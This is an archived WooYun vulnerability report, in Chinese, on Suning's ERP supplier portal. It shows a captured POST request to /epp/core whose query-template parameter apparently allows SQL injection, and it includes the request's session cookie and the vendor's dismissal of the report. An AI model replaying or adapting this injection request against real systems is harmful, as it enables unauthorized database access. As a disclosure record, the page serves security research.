乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-31: 细节已通知厂商并且等待厂商处理中 2015-01-05: 厂商已经主动忽略漏洞,细节向公众公开
RT
漏洞存在于http://erp.suning.com.cn/epp/先注册个账户:test123/testtest登录进去,点击【入围通知】--查询,并抓包:
POST /epp/core HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: http://erp.suning.com.cn/epp/core/manageui.jsp?ctrl=nc.web.epp.k0160.EntryPublishController&delegator=nc.web.epp.k0160.EntryPublishDelegator&roleid=0A&pageId=H0K30160method: POST /epp/core HTTP/1.1Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)Host: erp.suning.com.cnContent-Length: 604Proxy-Connection: Keep-AlivePragma: no-cacheCookie: JSESSIONID=36BB27D5ADE629156151ABA7DFBFFF06.server; JSESSIONID=B42E4B218B630709D26EB7836EE0B7A5.servertype=query&xml=<rpc><dataset id='epp_entrypublishlist_pp_ip_entrypublish' pageindex='0' ><req-parameters><parameter name='$$query_template_condition'>%20bisoverdue%20%3D%20%26apos%3BN%26apos%3B%20*</parameter><parameter name='query_param_values_list'>%7B%3D%2CString%2Cbisoverdue%2CN%7D%2C%7B%3D%2CString%2Cbisfailed%2CN%7D%2C</parameter><parameter name='$$from_query_model'>true</parameter></req-parameters></dataset></rpc>&delegator=nc.web.epp.k0160.EntryPublishDelegator&pageId=H0K30160&pageUniqueId=4a7bb237-51e9-4ff1-8858-3d92ded30ad8&isAjax=1
你们懂的
危害等级:无影响厂商忽略
忽略时间:2015-01-05 13:26
暂无